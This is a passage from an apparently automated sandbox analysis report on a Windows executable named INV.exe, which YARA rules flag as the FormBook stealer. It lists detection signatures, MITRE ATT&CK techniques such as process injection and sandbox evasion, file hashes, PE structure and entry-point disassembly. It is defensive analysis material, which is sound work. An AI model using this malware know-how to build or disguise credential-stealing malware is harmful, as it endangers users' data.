caleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_010666CA
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_0106E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0106E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_0106E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,3_2_01065C88
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01062679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_01062679

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation | DLL Side-Loading 1 | Process Injection 111 | Modify Registry 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Application Shimming 1 | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming 1 | Disable or Modify Tools 1 | Security Account Manager | Security Software Discovery 61 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 111 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | System Information Discovery 32 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph: ID 323458, Sample: INV.exe, Start date: 27/11/2020, Architecture: WINDOWS, Score: 72]
          Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Yara detected FormBook; Machine Learning detection for sample
          Process chain: INV.exe started INV.exe, conhost.exe and INV.exe; INV.exe (Maps a DLL or memory area into another process) started INV.exe; INV.exe started WerFault.exe; WerFault.exe dropped C:\ProgramData\Microsoft\...\Report.wer, Little-endian

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INV.exe | 100% | Avira | ADWARE/MultiPlug.Gen7
          INV.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.0.INV.exe.1060000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          4.0.INV.exe.1060000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          4.2.INV.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.INV.exe.1060000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          2.2.INV.exe.1060000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          3.2.INV.exe.1060000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
          0.2.INV.exe.1060000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
          4.2.INV.exe.1060000.1.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          3.0.INV.exe.1060000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmp | false | | high

                                      Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox Version:31.0.0 Red Diamond
                                      Analysis ID:323458
                                      Start date:27.11.2020
                                      Start time:02:05:12
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 39s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:INV.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:22
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal72.troj.evad.winEXE@9/4@0/0
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 47.7% (good quality ratio 44%)
                                      • Quality average: 80.9%
                                      • Quality standard deviation: 30.5%
                                      HCA Information:
                                      • Successful, ratio: 74%
                                      • Number of executed functions: 17
                                      • Number of non-executed functions: 75
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 51.104.144.132, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323458/sample/INV.exe

                                      Simulations

                                      Behavior and APIs

                                      Time | Type | Description
                                      02:06:35 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INV.exe_7fa5c1fc50c97be82372a0bb1297551a3548ed7_49edae5c_07187e10\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):11318
                                      Entropy (8bit):3.766850711619048
                                      Encrypted:false
                                      SSDEEP:96:rZaZuQOl+hVkDNfypXIQcQvc6QcEDMcw3Db+HbHgg5uHjgtYsaSiYuka5o1CvnrN:NaZuQCMHBUZMXYjGd/u7sdS274It56i
                                      MD5:EFA8B9C67840D9F908C18F2FB070DFCF
                                      SHA1:3288B62685CE903BF575D1DC2D3783EC89D8F70D
                                      SHA-256:677F52CAAB368AEA97203A9B5FC83985BFF81B90CBD0CC051E05A9478559DFDA
                                      SHA-512:E0DD05D2E0D28E2D5D31692AABA0FC4A14EF0112C2CD07E06E3AD0E79DFA99066FA5A2945BB26E21CE636456CC72F577CA2E19372972EE9207C823F317FBBAAF
                                      Malicious:true
                                      Reputation:low
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.9.1.2.7.6.6.1.8.1.9.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.9.1.2.7.7.0.9.7.8.7.8.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.4.6.8.0.5.9.-.0.3.d.7.-.4.0.0.a.-.a.8.2.a.-.2.5.5.7.5.5.a.b.0.4.b.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.c.b.e.2.8.c.-.3.5.0.b.-.4.5.6.7.-.8.f.6.5.-.d.2.8.0.8.2.5.b.f.b.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.2.8.-.0.0.0.1.-.0.0.1.b.-.e.e.0.f.-.d.4.7.8.5.9.c.4.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.d.3.5.a.e.9.1.5.c.2.c.9.6.f.c.6.d.3.6.c.e.5.2.8.8.0.2.e.4.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.8.0.e.8.1.b.a.b.3.4.1.e.d.a.0.d.4.0.4.b.8.f.5.f.e.d.9.3.b.c.3.b.3.5.0.c.f.b.d.!.I.N.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER12D4.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6260
                                      Entropy (8bit):3.7234725373206197
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNi5v62LYZ2SkH+prT89brbmsfAeRjm:RrlsNih6MYZ2SkHrbFfAM6
                                      MD5:0445C4911E8BD6F8CCDECD7ECE1F0EED
                                      SHA1:F9F94B93692A1F1447E80FE4B50E39D9783B51AD
                                      SHA-256:2FBBA0C8E59A8B1D6C2DF616B250CD1796EA0C8291352FD71180DAE0773C0D75
                                      SHA-512:8A84D40FE755D451A4068FCE2671947792784CEAFB495A02F0EA1EA138F9D595234795AE7E98ED59A6B5B27E1024EEBE88802BBBF20E5F138D049D390B579BF9
                                      Malicious:false
                                      Reputation:low
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.5.6.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C9.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4533
                                      Entropy (8bit):4.456542350506463
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zspJgtWI9mYWSC8B/8fm8M4JA+ZFYN+q8Hxg7zqvJupd:uITf7hRSNKJn0NIe7mv4pd
                                      MD5:94519179BDCB8BA568890471088FD3B5
                                      SHA1:FBBE4BB0B25E7F99245025CC7673A4019A1A7353
                                      SHA-256:D9FB01E02CCD6D6A42DFB73A2FA94171952F440E6CD9553357F01A244CA6262E
                                      SHA-512:370ADE951BD152ACD84C37EF29F084691BB73061879123D7B6A422EE34EC7C5B6F50A78F7FF1A139181BF18AD1CC7D9E733ABC265260AC5B751B52BFE25629AD
                                      Malicious:false
                                      Reputation:low
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="746536" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD26.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Fri Nov 27 01:06:07 2020, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):110238
                                      Entropy (8bit):3.479625234997686
                                      Encrypted:false
                                      SSDEEP:768:bgCe5gNbDqmyhZ303oHqUD8CQjPOWQaCgUziUHloTAZ1ExqaLQoKEequOED:7ttLS303oGFSNaCgUziUbEQuVuOED
                                      MD5:D14107A7F95EFA4361734C6926E9AA10
                                      SHA1:1D25716F92DCCD4330427C663874EE013F9AC6D2
                                      SHA-256:10C702BE8D1F96B759604E675FE55DBCD0DF5CC6D5A13FDC8F917024AD6B9168
                                      SHA-512:819011E98E92F19BB21F9FBED53A78BBBCB544D701A673CDB114656C47792BA4EEF067E93B429F041EECD895BEC3C980B88EBEE6B7BBF10B5F4AD4C9E1B7C6F1
                                      Malicious:false
                                      Reputation:low

                                      Static File Info

                                      General

                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                      Entropy (8bit):7.734539190231703
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:INV.exe
                                      File size:394240
                                      MD5:83259cb82642666503278233421c306d
                                      SHA1:180e81bab341eda0d404b8f5fed93bc3b350cfbd
                                      SHA256:6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
                                      SHA512:c5b2342cdd849a49b4e2472c563301aa3f69d192317901f13dd94db5ad680db7b6e529a6b23fd2528e6378a08f058ee06a9663c8539ce44655235fd241cdc5c7
                                      SSDEEP:6144:OKRY0sMhL5VwjYGFzVfPn1IqXJ7kELwepHTAXF3QOrIxc8V4rJH:OKBsM1whBPn1IWdkELLpHU1Xrmc8V4
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0Y.ecY.ecY.ec...c@.ec...cV.ec...c<.ec.S.cT.ecY.dc3.ecT..cX.ecT..cX.ecY..cX.ecT..cX.ecRichY.ec........................PE..L..

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x40127b
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x5FC0322D [Thu Nov 26 22:54:37 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:e5251995cfb2fe7a12656fff0fe17665

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F2D98FF681Eh
                                      jmp 00007F2D98FF525Ah
                                      push ebp
                                      mov ebp, esp
                                      mov eax, dword ptr [ebp+08h]
                                      mov eax, dword ptr [eax]
                                      cmp dword ptr [eax], E06D7363h
                                      jne 00007F2D98FF5447h
                                      cmp dword ptr [eax+10h], 03h
                                      jne 00007F2D98FF5441h
                                      mov eax, dword ptr [eax+14h]
                                      cmp eax, 19930520h
                                      je 00007F2D98FF543Dh
                                      cmp eax, 19930521h
                                      je 00007F2D98FF5436h
                                      cmp eax, 19930522h
                                      je 00007F2D98FF542Fh
                                      cmp eax, 01994000h
                                      je 00007F2D98FF5428h
                                      xor eax, eax
                                      pop ebp
                                      retn 0004h
                                      call 00007F2D98FF6BBCh
                                      int3
                                      push 00401285h
                                      call 00007F2D98FF720Bh
                                      pop ecx
                                      xor eax, eax
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      call 00007F2D98FF575Eh
                                      mov esi, eax
                                      test esi, esi
                                      je 00007F2D98FF556Bh
                                      mov edx, dword ptr [esi+5Ch]
                                      mov ecx, edx
                                      push edi
                                      mov edi, dword ptr [ebp+08h]
                                      cmp dword ptr [ecx], edi
                                      je 00007F2D98FF542Fh
                                      add ecx, 0Ch
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jc 00007F2D98FF5411h
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jnc 00007F2D98FF5426h
                                      cmp dword ptr [ecx], edi
                                      je 00007F2D98FF5424h
                                      xor ecx, ecx
                                      test ecx, ecx
                                      je 00007F2D98FF5536h
                                      mov edx, dword ptr [ecx+08h]
                                      test edx, edx
                                      je 00007F2D98FF552Bh
                                      cmp edx, 05h
                                      jne 00007F2D98FF542Eh
                                      and dword ptr [ecx+08h], 00000000h
                                      xor eax, eax
                                      inc eax
                                      jmp 00007F2D98FF551Bh
                                      cmp edx, 01h
                                      jne 00007F2D98FF542Ah
                                      or eax, FFFFFFFFh
                                      jmp 00007F2D98FF550Eh

                                      Rich Headers

                                      Programming Language:
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 build 21005

                                      Data Directories

                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d124          0x8c          .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x62000          0x1e0         .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x63000          0x130c        .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x1cc68          0x40          .rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_IAT             0x18000          0x1c0         .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                      Sections

                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                                         Entropy        Characteristics
                                      .text   0x1000           0x16e9f       0x17000   False     0.517747961957   data                                              6.61669655756  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata  0x18000          0x5bb4        0x5c00    False     0.373259171196   data                                              4.5684318813   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data   0x1e000          0x43b44       0x41e00   False     0.988499911053   DOS executable (block device driver\377\377\200)  7.98533790258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc   0x62000          0x1e0         0x200     False     0.52734375       data                                              4.70436301348  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc  0x63000          0x130c        0x1400    False     0.778515625      data                                              6.50096033347  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name         RVA      Size   Type                   Language  Country
                                      RT_MANIFEST  0x62060  0x17d  XML 1.0 document text  English   United States

                                      Imports

                                      DLL           Import
